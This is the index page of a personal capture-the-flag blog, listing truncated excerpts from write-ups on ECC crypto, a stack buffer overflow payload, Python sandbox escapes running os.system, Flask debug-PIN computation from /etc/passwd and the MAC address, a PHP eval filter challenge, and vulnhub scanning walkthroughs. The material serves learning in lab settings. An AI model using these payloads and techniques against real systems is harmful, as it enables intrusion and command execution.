NEKO

NEKO

superficial aesthetics

ECC-learn
感觉ECC这方面挺薄弱的,记得以前写过一个计算ECC公钥的脚本,刚才看了下貌似是错的?玩极客大挑战时和zeroi3搞一道ECC的题也花了好久时间。 弱すきだと思いけれと、まあ、頑張ります。以后遇到ECC的题目就在这记录一下。ECC的一些基础知识:https://ctf-wiki.github.io/ctf-wiki/crypto/asymmetric/discrete-log/ecc/https://www.pediy.com/kssd/pediy06/pediy6014.htm geek_9thattachment:12345678910y^2 = x^3 - 4 (mod 13000...
护网杯wp
MISC迟来的签到题效仿的CSAW2018的一道密码学的题,但提示没CSAW那么坑,爆破异或就行了。 exp.py12345678910from __future__ import print_functions='AAoHAR0nJ1YlUVQnU1BTVCVfUVZRUVUkUCBeUlVWIlBXUiNTXhs='.decode('base64')flag=''for i in range(0xff+1): for j in s: try: print(chr(ord(j)^i),...
root-me-app-system
ELF x86 - Stack buffer overflow basic 1gdb调一下熟悉下gdb的使用方法. payload:1(python -c 'print "a"*40+"DEADBEEF".decode("hex")[::-1]';cat) | ./ch13 不加;cat的话shell会直接退出,因为system(‘/bin/dash’)读到了stdin中的EOF,通过cat占用输入流即可. ELF x86 - Stack buffer overflow basic 2gdb下i functi...
CSAW CTF 2018 Writeup
To improve my English level and change my Chinglish to English,I am going to write article with English.Fuck me ,i just cant get the point what the guys say in IRC. Cryptobabycryptothe hint is odd, but not too hard.think about the xor, and get the flag. 1234 cat ciphertext.txt| base64 -D > d...
Python Sandbox Excape
打了下比赛,发现python沙盒逃逸的东西有些遗忘,从头再记录一遍。 python2python中对一个变量应用class方法从一个变量实例转到对应的对象类型后,类有以下三种关于继承关系的方法 __base__ 对象的一个基类,一般情况下是object,有时不是,这时需要使用下一个方法__mro__ 同样可以获取对象的基类,只是这时会显示出整个继承链的关系,是一个列表,object在最底层故在列表中的最后,通过__mro__[-1]可以获取到__subclasses__() 继承此对象的子类,返回一个列表1234>>> [().__class__.__bases__[i...
noxCTF-2018 writeup
https://ctftime.org/event/671/tasks/我就是单纯地想自己写一遍(:з」∠)https://ctftime.org/event/671/tasks/ MISCPython for funpython3沙盒绕过,没有waf。本地实验:(题目要求填写fun()的参数)12345def fun(a,b=(print(__import__('os').system('ls')))): c=a+b return cfun(1,2) result:12345BlindDate.jpegflag.jpegtest.pytest1.py0 Python for...
python Debug命令执行
12345678md5_list = [ 'root', #当前用户,可通过读取/etc/passwd获取 'flask.app', #一般情况为固定值 'Flask', #一般情况为固定值 '/usr/local/lib/python2.7/dist-packages/flask/app.pyc', #可通过debug错误页面获取 '2485377892354', #mac地址的十进制,通过读取/sys/class/net/eth0/address获取mac...
xman-2018
**12345678910111213141516<?phpinclude 'flag.php';if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)>40){ die("Long."); } if(preg_match("/[A-Za-z0-9]+/",$code)){ die("NO."); } @eval($code);}else{ highlight_f...
vulnhub-Bulldog
服务扫描给了ip,直接扫服务12345678910111213nmap -sS -A -O -Pn -T4 192.168.199.12923/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 2048 20:8b:fc:9e:d9:2e:28:22:6b:2e:0e:e3:72:c5:bb:52 (RSA)| 256 cd:bd:45:d8:5c:e4:8c:b6:91:e5:39:a9:66:cb:d7:98 (ECDSA)|_ 2...
vulnhub-Lazysysadmin
主机扫描1nmap -sP 10.10.10.0/24 发现靶机ip:10.10.10.188 服务扫描12345678nmap -sS -Pn -T4 10.10.10.18822/tcp open ssh80/tcp open http139/tcp open netbios-ssn445/tcp open microsoft-ds3306/tcp open mysql6667/tcp open irc 445端口有smb服务,6667开启了irc服务,139开启了NBT服务. 扫目录从80入手1python3 dirsearch.py -u 10.10.10...
n3k0
incisive expression